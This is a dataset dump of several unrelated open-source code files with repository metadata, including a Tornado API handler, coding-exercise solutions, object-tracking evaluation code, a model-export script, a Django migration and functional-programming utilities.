* [Fang, Hasan, and Marton (2014)](https://doi.org/10.1016/j.jbankfin.2013.11.003),
Institutional development and bank stability: Evidence from transition countries, *Journal of Banking & Finance*, 39, 160-176.
"""
return (roa + capital_ratio) / np.std(past_roas)
| 48.641509 | 138 | 0.653607 |
ba066e403d0a2fcc3e236db9bda922b65a5fae78
| 1,650 |
py
|
Python
|
handler/GenericApiHandler.py
|
wchming1987/Tumbler
|
e309771779c8eb44e685adbb691a428d29009e05
|
[
"Apache-2.0"
] | null | null | null |
handler/GenericApiHandler.py
|
wchming1987/Tumbler
|
e309771779c8eb44e685adbb691a428d29009e05
|
[
"Apache-2.0"
] | null | null | null |
handler/GenericApiHandler.py
|
wchming1987/Tumbler
|
e309771779c8eb44e685adbb691a428d29009e05
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding=utf-8 -*-
import json
from tornado.web import RequestHandler, HTTPError
import pymongo
FORM_REPRESENTATION = ''
JSON_REPRESENTATION = 'application/json'
HTTP_BAD_REQUEST = 400
HTTP_FORBIDDEN = 403
HTTP_NOT_FOUND = 404
class GenericApiHandler(RequestHandler):
"""
The purpose of this class is to take benefit of inheritance and prepare
a set of common functions for
the handlers
"""
def __init__(self, application, request, **kwargs):
self.database = None
self.param_args = None
super(GenericApiHandler, self).__init__(application, request, **kwargs)
def initialize(self, database):
self.database = database
def prepare(self):
if not (self.request.method == "GET" or self.request.method == "DELETE"):
if self.request.headers.get("Content-Type") is not None:
if self.request.headers["Content-Type"].startswith(JSON_REPRESENTATION):
try:
self.param_args = json.loads(self.request.body)
except (ValueError, KeyError, TypeError) as error:
raise HTTPError(HTTP_BAD_REQUEST,
"Bad Json format [{}]".
format(error))
elif self.request.headers["Content-Type"].startswith(FORM_REPRESENTATION):
pass
else:
pass
def finish_request(self, json_object):
self.write(json.dumps(json_object))
self.set_header("Content-Type", JSON_REPRESENTATION)
self.finish()
| 31.730769 | 90 | 0.600606 |
ba29ca9bbdfa4034dfe13b1f64ea12d30bbf4923
| 3,446 |
py
|
Python
|
7-assets/past-student-repos/LambdaSchool-master/m7/74a1/day2.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
7-assets/past-student-repos/LambdaSchool-master/m7/74a1/day2.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
7-assets/past-student-repos/LambdaSchool-master/m7/74a1/day2.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
# Problem 1: Two Sum
class Solution(object):
def twoSum(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
# Given an array of integers, return indices of the two numbers such that they add up to a specific target.
# You may assume that each input would have exactly one solution, and you may not use the same element twice.
# total = 0
# for key, value in nums
# total = total + value
# for key1, value1 in nums
# if key != key1
# total = total + value1
# if total == target
# return [key, key1]
total = 0
for x in range(0, len(nums)):
total = 0
for y in range(0, len(nums)):
if x != y:
total = nums[x] + nums[y]
if total == target:
return [x, y]
# Problem 2: Implement a Queue Using Stacks
class MyQueue(object):
# Implement the following operations of a queue (FIFO) using stacks (LIFO).
# Depending on your language, stack may not be supported natively. You may simulate a stack by using a list or deque(double-ended queue), as long as you use only standard operations of a stack.
# You may assume that all operations are valid (for example, no pop or peek operations will be called on an empty queue).
# You must use only standard operations of a stack -- which means only:
# peek from top
# pop from top
# push to bottom
# size
# is empty
def __init__(self):
"""
Initialize your data structure here.
"""
self.stack1 = []
self.stack2 = []
def push(self, x):
"""
Push element x to the back of queue.
:type x: int
:rtype: None
"""
# while self.stack1 not empty, append its last element to stack2
while self.stack1:
popped1 = self.stack1.pop()
self.stack2.append(popped1)
# then append x to stack1, which is empty
self.stack1.append(x)
# then put all the other elements, now on stack2, back on stack1
while self.stack2:
popped2 = self.stack2.pop()
self.stack1.append(popped2)
def pop(self):
"""
Removes the element from in front of queue and returns that element.
:rtype: int
"""
# remove last element of stack, which is front element of queue, and return it
popped = self.stack1.pop()
return popped
def peek(self):
"""
Get the front element.
:rtype: int
"""
# return last element of stack, which is front element of queue (no removal)
front_element = self.stack1[-1]
return front_element
def empty(self):
"""
Returns whether the queue is empty.
:rtype: bool
"""
# if both stacks are empty, return true; else return false
if not self.stack1 and not self.stack2:
is_empty = True
else:
is_empty = False
return is_empty
# Your MyQueue object will be instantiated and called as such:
# obj = MyQueue()
# obj.push(x)
# param_2 = obj.pop()
# param_3 = obj.peek()
# param_4 = obj.empty()
| 30.767857 | 201 | 0.548172 |
2cfb8a9e6c36a1c557b03fb7463c8e214fbe1449
| 92 |
py
|
Python
|
2014/09/table-state-debt-protections/graphic_config.py
|
nprapps/graphics-archive
|
97b0ef326b46a959df930f5522d325e537f7a655
|
[
"FSFAP"
] | 14 |
2015-05-08T13:41:51.000Z
|
2021-02-24T12:34:55.000Z
|
2014/09/table-state-debt-protections/graphic_config.py
|
nprapps/graphics-archive
|
97b0ef326b46a959df930f5522d325e537f7a655
|
[
"FSFAP"
] | null | null | null |
2014/09/table-state-debt-protections/graphic_config.py
|
nprapps/graphics-archive
|
97b0ef326b46a959df930f5522d325e537f7a655
|
[
"FSFAP"
] | 7 |
2015-04-04T04:45:54.000Z
|
2021-02-18T11:12:48.000Z
|
#!/usr/bin/env python
COPY_GOOGLE_DOC_KEY = '1UfWWQPek40kyjAu13zIbNkvUjUxsyDHw-xvFAZZjsLA'
| 23 | 68 | 0.836957 |
d70a2d0e05afce86a65eb5c0c7b0b4b335355c51
| 628 |
py
|
Python
|
Interview Preparation Kits/Interview Preparation Kit/Sorting/Sorting: Bubble Sort/bubble_sort.py
|
xuedong/hacker-rank
|
ce8a60f80c2c6935b427f9409d7e826ee0d26a89
|
[
"MIT"
] | 1 |
2021-02-22T17:37:45.000Z
|
2021-02-22T17:37:45.000Z
|
Interview Preparation Kits/Interview Preparation Kit/Sorting/Sorting: Bubble Sort/bubble_sort.py
|
xuedong/hacker-rank
|
ce8a60f80c2c6935b427f9409d7e826ee0d26a89
|
[
"MIT"
] | null | null | null |
Interview Preparation Kits/Interview Preparation Kit/Sorting/Sorting: Bubble Sort/bubble_sort.py
|
xuedong/hacker-rank
|
ce8a60f80c2c6935b427f9409d7e826ee0d26a89
|
[
"MIT"
] | null | null | null |
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the countSwaps function below.
def countSwaps(a):
n = len(a)
count = 0
for i in range(n):
for j in range(n-1):
if a[j] > a[j+1]:
tmp = a[j]
a[j] = a[j+1]
a[j+1] = tmp
count += 1
print("Array is sorted in "+str(count)+" swaps.")
print("First Element: "+str(a[0]))
print("Last Element: "+str(a[n-1]))
return
if __name__ == '__main__':
n = int(input())
a = list(map(int, input().rstrip().split()))
countSwaps(a)
| 18.470588 | 53 | 0.506369 |
d15f8f420c6ec1a3e00d5a89ac3ae1f28d487841
| 394 |
py
|
Python
|
Versuch3/task1.1.py
|
Tobias-Schoch/SSS
|
f8b078ca7f6482fc7c89d5f9e784a549459eefb7
|
[
"MIT"
] | null | null | null |
Versuch3/task1.1.py
|
Tobias-Schoch/SSS
|
f8b078ca7f6482fc7c89d5f9e784a549459eefb7
|
[
"MIT"
] | null | null | null |
Versuch3/task1.1.py
|
Tobias-Schoch/SSS
|
f8b078ca7f6482fc7c89d5f9e784a549459eefb7
|
[
"MIT"
] | 1 |
2022-01-06T12:47:53.000Z
|
2022-01-06T12:47:53.000Z
|
from TekTDS2000 import *
scope = TekTDS2000()
# Einlesen vom Channel 1 und vom Channel 2
scope.saveCsv(filename='versuch3/kleinerLautsprecher/100.csv', ch=1)
scope.saveCsv(filename='100_2.csv', ch=2)
# Einlesen der Frequenz und der Periode
frequency = scope.getFreq(1)
period = scope.getPeriod(1)
# Ausgeben der Frequenz und der Periode
print("Frequenz", frequency)
print("Periode", period)
| 26.266667 | 68 | 0.766497 |
0f05a017ee32868d8d4019d8110cff01aedb2524
| 8,457 |
py
|
Python
|
research/cv/siamRPN/src/evaluation.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/siamRPN/src/evaluation.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/siamRPN/src/evaluation.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""" evaluation """
import numpy as np
from shapely.geometry import Polygon
def calculate_eao(dataset_name, all_failures, all_overlaps, gt_traj_length, skipping=5):
'''
input:dataset name
all_failures: type is list , index of failure
all_overlaps: type is list , length of list is the length of all_failures
gt_traj_length: type is list , length of list is the length of all_failures
skipping:number of skipping per failing
'''
if dataset_name == "VOT2016":
low = 108
high = 371
elif dataset_name == "VOT2015":
low = 108
high = 371
fragment_num = sum([len(x)+1 for x in all_failures])
max_len = max([len(x) for x in all_overlaps])
tags = [1] * max_len
seq_weight = 1 / (1 + 1e-10) # division by zero
eao = {}
# prepare segments
fweights = np.ones(fragment_num, dtype=np.float32) * np.nan
fragments = np.ones((fragment_num, max_len), dtype=np.float32) * np.nan
seg_counter = 0
for traj_len, failures, overlaps in zip(gt_traj_length, all_failures, all_overlaps):
if failures:
points = [x+skipping for x in failures if
x+skipping <= len(overlaps)]
points.insert(0, 0)
for i, _ in enumerate(points):
if i != len(points) - 1:
fragment = np.array(overlaps[points[i]:points[i+1]+1], dtype=np.float32)
fragments[seg_counter, :] = 0
else:
fragment = np.array(overlaps[points[i]:], dtype=np.float32)
fragment[np.isnan(fragment)] = 0
fragments[seg_counter, :len(fragment)] = fragment
if i != len(points) - 1:
tag_value = tags[points[i]:points[i+1]+1]
w = sum(tag_value) / (points[i+1] - points[i]+1)
fweights[seg_counter] = seq_weight * w
else:
tag_value = tags[points[i]:len(overlaps)]
w = sum(tag_value) / (traj_len - points[i]+1e-16)
fweights[seg_counter] = seq_weight * w
seg_counter += 1
else:
# no failure
max_idx = min(len(overlaps), max_len)
fragments[seg_counter, :max_idx] = overlaps[:max_idx]
tag_value = tags[0: max_idx]
w = sum(tag_value) / max_idx
fweights[seg_counter] = seq_weight * w
seg_counter += 1
expected_overlaps = calculate_expected_overlap(fragments, fweights)
print(len(expected_overlaps))
# calculate eao
weight = np.zeros((len(expected_overlaps)))
weight[low-1:high-1+1] = 1
expected_overlaps = np.array(expected_overlaps, dtype=np.float32)
is_valid = np.logical_not(np.isnan(expected_overlaps))
eao_ = np.sum(expected_overlaps[is_valid] * weight[is_valid]) / np.sum(weight[is_valid])
eao = eao_
return eao
def calculate_expected_overlap(fragments, fweights):
""" compute expected iou """
max_len = fragments.shape[1]
expected_overlaps = np.zeros((max_len), np.float32)
expected_overlaps[0] = 1
# TODO Speed Up
for i in range(1, max_len):
mask = np.logical_not(np.isnan(fragments[:, i]))
if np.any(mask):
fragment = fragments[mask, 1:i+1]
seq_mean = np.sum(fragment, 1) / fragment.shape[1]
expected_overlaps[i] = np.sum(seq_mean *
fweights[mask]) / np.sum(fweights[mask])
return expected_overlaps
def calculate_accuracy_failures(pred_trajectory, gt_trajectory, \
bound=None):
'''
args:
pred_trajectory:list of bbox
gt_trajectory: list of bbox ,shape == pred_trajectory
bound :w and h of img
return :
overlaps:list ,iou value in pred_trajectory
acc : mean iou value
failures: failures point in pred_trajectory
num_failures: number of failres
'''
overlaps = []
failures = []
for i, pred_traj in enumerate(pred_trajectory):
if len(pred_traj) == 1:
if pred_trajectory[i][0] == 2:
failures.append(i)
overlaps.append(float("nan"))
else:
if bound is not None:
poly_img = Polygon(np.array([[0, 0],\
[0, bound[1]],\
[bound[0], bound[1]],\
[bound[0], 0]])).convex_hull
if len(gt_trajectory[i]) == 8:
poly_pred = Polygon(np.array([[pred_trajectory[i][0], pred_trajectory[i][1]], \
[pred_trajectory[i][2], pred_trajectory[i][1]], \
[pred_trajectory[i][2], pred_trajectory[i][3]], \
[pred_trajectory[i][0], pred_trajectory[i][3]] \
])).convex_hull
poly_gt = Polygon(np.array(gt_trajectory[i]).reshape(4, 2)).convex_hull
if bound is not None:
gt_inter_img = poly_gt.intersection(poly_img)
pred_inter_img = poly_pred.intersection(poly_img)
inter_area = gt_inter_img.intersection(pred_inter_img).area
overlap = inter_area /(gt_inter_img.area + pred_inter_img.area - inter_area)
else:
inter_area = poly_gt.intersection(poly_pred).area
overlap = inter_area / (poly_gt.area + poly_pred.area - inter_area)
elif len(gt_trajectory[i]) == 4:
overlap = iou(np.array(pred_trajectory[i]).reshape(-1, 4), np.array(gt_trajectory[i]).reshape(-1, 4))
overlaps.append(overlap)
acc = 0
num_failures = len(failures)
if overlaps:
acc = np.nanmean(overlaps)
return acc, overlaps, failures, num_failures
def judge_failures(pred_bbox, gt_bbox, threshold=0):
"""" judge whether to fail or not """
if len(gt_bbox) == 4:
if iou(np.array(pred_bbox).reshape(-1, 4), np.array(gt_bbox).reshape(-1, 4)) > threshold:
return False
else:
poly_pred = Polygon(np.array([[pred_bbox[0], pred_bbox[1]], \
[pred_bbox[2], pred_bbox[1]], \
[pred_bbox[2], pred_bbox[3]], \
[pred_bbox[0], pred_bbox[3]] \
])).convex_hull
poly_gt = Polygon(np.array(gt_bbox).reshape(4, 2)).convex_hull
inter_area = poly_gt.intersection(poly_pred).area
overlap = inter_area / (poly_gt.area + poly_pred.area - inter_area)
if overlap > threshold:
return False
return True
def iou(box1, box2):
""" compute iou """
box1, box2 = box1.copy(), box2.copy()
N = box1.shape[0]
K = box2.shape[0]
box1 = np.array(box1.reshape((N, 1, 4)))+np.zeros((1, K, 4))#box1=[N,K,4]
box2 = np.array(box2.reshape((1, K, 4)))+np.zeros((N, 1, 4))#box1=[N,K,4]
x_max = np.max(np.stack((box1[:, :, 0], box2[:, :, 0]), axis=-1), axis=2)
x_min = np.min(np.stack((box1[:, :, 2], box2[:, :, 2]), axis=-1), axis=2)
y_max = np.max(np.stack((box1[:, :, 1], box2[:, :, 1]), axis=-1), axis=2)
y_min = np.min(np.stack((box1[:, :, 3], box2[:, :, 3]), axis=-1), axis=2)
tb = x_min-x_max
lr = y_min-y_max
tb[np.where(tb < 0)] = 0
lr[np.where(lr < 0)] = 0
over_square = tb*lr
all_square = (box1[:, :, 2] - box1[:, :, 0]) * (box1[:, :, 3] - box1[:, :, 1]) + (box2[:, :, 2] - \
box2[:, :, 0]) * (box2[:, :, 3] - box2[:, :, 1]) - over_square
return over_square / all_square
| 41.053398 | 117 | 0.554097 |
0e5f207e1c579d7f5fa8a8929dfe91a057ab4b6e
| 2,604 |
py
|
Python
|
examples/text_correction/ernie-csc/export_model.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
examples/text_correction/ernie-csc/export_model.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
examples/text_correction/ernie-csc/export_model.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: UTF-8 -*-
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import paddle
from paddle.static import InputSpec
from paddlenlp.data import Vocab
from paddlenlp.transformers import ErnieModel
from model import ErnieForCSC
# yapf: disable
parser = argparse.ArgumentParser(__doc__)
parser.add_argument("--params_path", type=str, default='./checkpoints/final.pdparams', help="The path of model parameter to be loaded.")
parser.add_argument("--output_path", type=str, default='./infer_model/static_graph_params', help="The path of model parameter in static graph to be saved.")
parser.add_argument("--model_name_or_path", type=str, default="ernie-1.0", choices=["ernie-1.0"], help="Pretraining model name or path")
parser.add_argument("--pinyin_vocab_file_path", type=str, default="pinyin_vocab.txt", help="pinyin vocab file path")
args = parser.parse_args()
# yapf: enable
def main():
pinyin_vocab = Vocab.load_vocabulary(args.pinyin_vocab_file_path,
unk_token='[UNK]',
pad_token='[PAD]')
ernie = ErnieModel.from_pretrained(args.model_name_or_path)
model = ErnieForCSC(ernie,
pinyin_vocab_size=len(pinyin_vocab),
pad_pinyin_id=pinyin_vocab[pinyin_vocab.pad_token])
model_dict = paddle.load(args.params_path)
model.set_dict(model_dict)
model.eval()
model = paddle.jit.to_static(model,
input_spec=[
InputSpec(shape=[None, None],
dtype="int64",
name='input_ids'),
InputSpec(shape=[None, None],
dtype="int64",
name='pinyin_ids')
])
paddle.jit.save(model, args.output_path)
if __name__ == "__main__":
main()
| 40.6875 | 156 | 0.622888 |
70d5ff9cb1047424cb3978c8a7246c8748053807
| 1,073 |
py
|
Python
|
apps/quiver/migrations/0004_analyticsserviceexecution.py
|
IT-PM-OpenAdaptronik/Webapp
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | 2 |
2017-12-17T21:28:22.000Z
|
2018-02-02T14:44:58.000Z
|
apps/quiver/migrations/0004_analyticsserviceexecution.py
|
IT-PM-OpenAdaptronik/Webapp
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | 118 |
2017-10-31T13:45:09.000Z
|
2018-02-24T20:51:42.000Z
|
apps/quiver/migrations/0004_analyticsserviceexecution.py
|
OpenAdaptronik/Rattler
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0 on 2019-04-26 12:24
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('quiver', '0003_auto_20190408_1347'),
]
operations = [
migrations.CreateModel(
name='AnalyticsServiceExecution',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('last_state', models.IntegerField(default=1)),
('last_contact', models.DateTimeField(blank=True, default=django.utils.timezone.now)),
('service', models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='quiver.AnalyticsService')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='user')),
],
),
]
| 38.321429 | 139 | 0.665424 |
70db54441aa54b5c1826421c2524a53b1fb554a1
| 5,083 |
py
|
Python
|
src/pfun/functions.py
|
suned/pfun
|
46c460646487abfef897bd9627891f6cf7870774
|
[
"MIT"
] | 126 |
2019-09-16T15:28:20.000Z
|
2022-03-20T10:57:53.000Z
|
src/pfun/functions.py
|
suned/pfun
|
46c460646487abfef897bd9627891f6cf7870774
|
[
"MIT"
] | 54 |
2019-09-30T08:44:01.000Z
|
2022-03-20T11:10:00.000Z
|
src/pfun/functions.py
|
suned/pfun
|
46c460646487abfef897bd9627891f6cf7870774
|
[
"MIT"
] | 11 |
2020-01-02T08:32:46.000Z
|
2022-03-20T11:10:24.000Z
|
import functools
import inspect
from typing import Any, Callable, Generic, Tuple, TypeVar
from .immutable import Immutable
A = TypeVar('A')
B = TypeVar('B')
C = TypeVar('C')
def identity(v: A) -> A:
"""
The identity function. Just gives back its argument
Example:
>>> identity('value')
'value'
Args:
v: The value to get back
Return:
`v`
"""
return v
Unary = Callable[[A], B]
Predicate = Callable[[A], bool]
class Always(Generic[A], Immutable):
"""
A Callable that always returns the same value
regardless of the arguments
Example:
>>> f = Always(1)
>>> f(None)
1
>>> f('')
1
>>> "... and so on..."
"""
value: A
def __call__(self, *args, **kwargs) -> A:
return self.value
def always(value: A) -> Callable[..., A]:
"""
Get a function that always returns `value`
Example:
>>> f = always(1)
>>> f(None)
1
>>> f('')
1
>>> "... and so on..."
Args:
value: The value to return always
Return:
function that always returns `value`
"""
return Always(value)
class Composition(Immutable):
functions: Tuple[Callable, ...]
def __repr__(self) -> str:
functions_repr = ', '.join(repr(f) for f in self.functions)
return f'compose({functions_repr})'
def __call__(self, *args, **kwargs):
fs = reversed(self.functions)
first, *rest = fs
last_result = first(*args, **kwargs)
for f in rest:
last_result = f(last_result)
return last_result
def compose(
f: Callable[[Any], Any],
g: Callable[[Any], Any],
*functions: Callable[[Any], Any]
) -> Callable[[Any], Any]:
"""
Compose functions from left to right
Example:
>>> f = lambda v: v * 2
>>> g = compose(str, f)
>>> g(3)
"6"
Args:
f: the outermost function in the composition
g: the function to be composed with f
functions: functions to be composed with `f` \
and `g` from left to right
Return:
`f` composed with `g` composed with `functions` from left to right
"""
fs: Tuple[Callable, ...] = ()
for h in (f, g) + functions:
if isinstance(h, Composition):
fs += h.functions
else:
fs += (h,)
return Composition(fs)
def pipeline(
first: Callable[[Any], Any],
second: Callable[[Any], Any],
*rest: Callable[[Any], Any]
):
"""
Compose functions from right to left
Example:
>>> f = lambda v: v * 2
>>> g = pipeline(f, str)
>>> g(3)
"6"
Args:
first: the innermost function in the composition
g: the function to compose with f
functions: functions to compose with `first` and \
`second` from right to left
Return:
`rest` composed from right to left, composed with \
`second` composed with `first`
"""
return compose(*reversed(rest), second, first)
class Curry:
_f: Callable
def __init__(self, f: Callable):
functools.wraps(f)(self)
self._f = f # type: ignore
def __repr__(self):
return f'curry({repr(self._f)})'
def __call__(self, *args, **kwargs):
signature = inspect.signature(self._f)
bound = signature.bind_partial(*args, **kwargs)
bound.apply_defaults()
arg_names = {a for a in bound.arguments.keys()}
parameters = {p for p in signature.parameters.keys()}
if parameters - arg_names == set():
return self._f(*args, **kwargs)
if isinstance(self._f, functools.partial):
partial = functools.partial(
self._f.func,
*(self._f.args + args),
**self._f.keywords,
**kwargs
)
else:
partial = functools.partial(self._f, *args, **kwargs)
return Curry(partial)
def curry(f: Callable) -> Callable:
"""
Get a version of ``f`` that can be partially applied
Example:
>>> f = lambda a, b: a + b
>>> f_curried = curry(f)
>>> f_curried(1)
functools.partial(<function <lambda> at 0x1051f0950>, a=1)
>>> f_curried(1)(1)
2
Args:
f: The function to curry
Returns:
Curried version of ``f``
"""
@functools.wraps(f)
def decorator(*args, **kwargs):
return Curry(f)(*args, **kwargs)
return decorator
def flip(f: Callable) -> Callable:
"""
Reverse the order of positional arguments of `f`
Example:
>>> f = lambda a, b, c: (a, b, c)
>>> flip(f)('a', 'b', 'c')
('c', 'b', 'a')
Args:
f: Function to flip positional arguments of
Returns:
Function with positional arguments flipped
"""
return curry(lambda *args, **kwargs: f(*reversed(args), **kwargs))
__all__ = [
'curry', 'always', 'compose', 'pipeline', 'identity', 'Unary', 'Predicate'
]
| 22.793722 | 78 | 0.540822 |
1debc1d832e5bb7b7bbae724c08f377029080340
| 1,631 |
py
|
Python
|
hisim/components/transformer.py
|
sdickler/HiSim
|
09a11d99f220f7cadb3cb7b09a6fce8f147243c8
|
[
"MIT"
] | 12 |
2021-10-05T11:38:24.000Z
|
2022-03-25T09:56:08.000Z
|
hisim/components/transformer.py
|
sdickler/HiSim
|
09a11d99f220f7cadb3cb7b09a6fce8f147243c8
|
[
"MIT"
] | 6 |
2021-10-06T13:27:55.000Z
|
2022-03-10T12:55:15.000Z
|
hisim/components/transformer.py
|
sdickler/HiSim
|
09a11d99f220f7cadb3cb7b09a6fce8f147243c8
|
[
"MIT"
] | 4 |
2022-02-21T19:00:50.000Z
|
2022-03-22T11:01:38.000Z
|
# Owned
from hisim.component import Component, SingleTimeStepValues, ComponentInput, ComponentOutput
from hisim import loadtypes as lt
from hisim.simulationparameters import SimulationParameters
class Transformer(Component):
TransformerInput = "Input1"
TransformerInput2 = "Optional Input1"
TransformerOutput = "MyTransformerOutput"
TransformerOutput2 = "MyTransformerOutput2"
def __init__(self, name: str, my_simulation_parameters: SimulationParameters ):
super().__init__(name=name, my_simulation_parameters=my_simulation_parameters)
self.input1: ComponentInput = self.add_input(self.ComponentName, Transformer.TransformerInput, lt.LoadTypes.Any, lt.Units.Any, True)
self.input2: ComponentInput = self.add_input(self.ComponentName, Transformer.TransformerInput2, lt.LoadTypes.Any, lt.Units.Any, False)
self.output1: ComponentOutput = self.add_output(self.ComponentName, Transformer.TransformerOutput, lt.LoadTypes.Any, lt.Units.Any)
self.output2: ComponentOutput = self.add_output(self.ComponentName, Transformer.TransformerOutput2, lt.LoadTypes.Any, lt.Units.Any)
def i_save_state(self):
pass
def i_doublecheck(self, timestep: int, stsv: SingleTimeStepValues):
pass
def i_restore_state(self):
pass
def i_simulate(self, timestep: int, stsv: SingleTimeStepValues, force_convergence: bool):
startval_1 = stsv.get_input_value(self.input1)
startval_2 = stsv.get_input_value(self.input2)
stsv.set_output_value(self.output1, startval_1 * 5)
stsv.set_output_value(self.output2, startval_2 * 1000)
| 49.424242 | 142 | 0.761496 |
aaa226c57c900244d0bdf47c3c39dd9ba552ab93
| 948 |
py
|
Python
|
7-assets/past-student-repos/LambdaSchool-master/m7/71e1/hashtables/ex1/ex1_tests.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
7-assets/past-student-repos/LambdaSchool-master/m7/71e1/hashtables/ex1/ex1_tests.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
7-assets/past-student-repos/LambdaSchool-master/m7/71e1/hashtables/ex1/ex1_tests.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
import unittest
from ex1 import get_indices_of_item_weights
class TestEx1(unittest.TestCase):
def test_ex1_1(self):
weights_1 = [9]
answer_1 = get_indices_of_item_weights(weights_1, 1, 9)
self.assertTrue(answer_1 is None)
def test_ex1_2(self):
weights_2 = [4, 4]
answer_2 = get_indices_of_item_weights(weights_2, 2, 8)
self.assertTrue(answer_2[0] == 1)
self.assertTrue(answer_2[1] == 0)
def test_ex1_3(self):
weights_3 = [4, 6, 10, 15, 16]
answer_3 = get_indices_of_item_weights(weights_3, 5, 21)
self.assertTrue(answer_3[0] == 3)
self.assertTrue(answer_3[1] == 1)
def test_ex1_4(self):
weights_4 = [12, 6, 7, 14, 19, 3, 0, 25, 40]
answer_4 = get_indices_of_item_weights(weights_4, 9, 7)
self.assertTrue(answer_4[0] == 6)
self.assertTrue(answer_4[1] == 2)
if __name__ == '__main__':
unittest.main()
| 27.882353 | 64 | 0.630802 |
aac65c2443408dd44a2a1ed03cb6be2dea43106e
| 1,530 |
py
|
Python
|
bearpi-hm_nano-oh_flower/00_src/bearpi-hm_nano_oh_fun/build/lite/setup.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | 1 |
2022-02-15T08:51:55.000Z
|
2022-02-15T08:51:55.000Z
|
hihope_neptune-oh_hid/00_src/v0.3/build/lite/setup.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | null | null | null |
hihope_neptune-oh_hid/00_src/v0.3/build/lite/setup.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020 Huawei Device Co., Ltd.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from setuptools import setup
WORK_PATH = os.path.dirname('__file__')
README_PATH = os.path.join(WORK_PATH, 'README.md')
LICENSE_PATH = os.path.join(WORK_PATH, 'LICENSE')
LONG_DESCRIPTION = open(README_PATH, 'rt', encoding='utf-8').read()
LICENSE = open(LICENSE_PATH, 'rt', encoding='utf-8').read()
setup(
name='ohos-build',
version='0.2.0',
description='OHOS build command line tool',
long_description=LONG_DESCRIPTION,
url='',
author='',
author_email='',
license=LICENSE,
python_requires='>=3.7',
packages=['hb', 'hb.build', 'hb.set', 'hb.cts',
'hb.common', 'hb.env', 'hb.clean', 'hb.deps'],
package_dir={'hb': 'hb'},
package_data={'hb': ['common/config.json']},
install_requires=['prompt_toolkit==1.0.14'],
entry_points={
'console_scripts': [
'hb=hb.__main__:main',
]
},
)
| 31.22449 | 74 | 0.668627 |
9309c40fc73d55bbb646a2a5a468f4242b2a94a5
| 167 |
py
|
Python
|
furniture_store/furniture_store/web/validators.py
|
trenev/softuni-python-web-basics
|
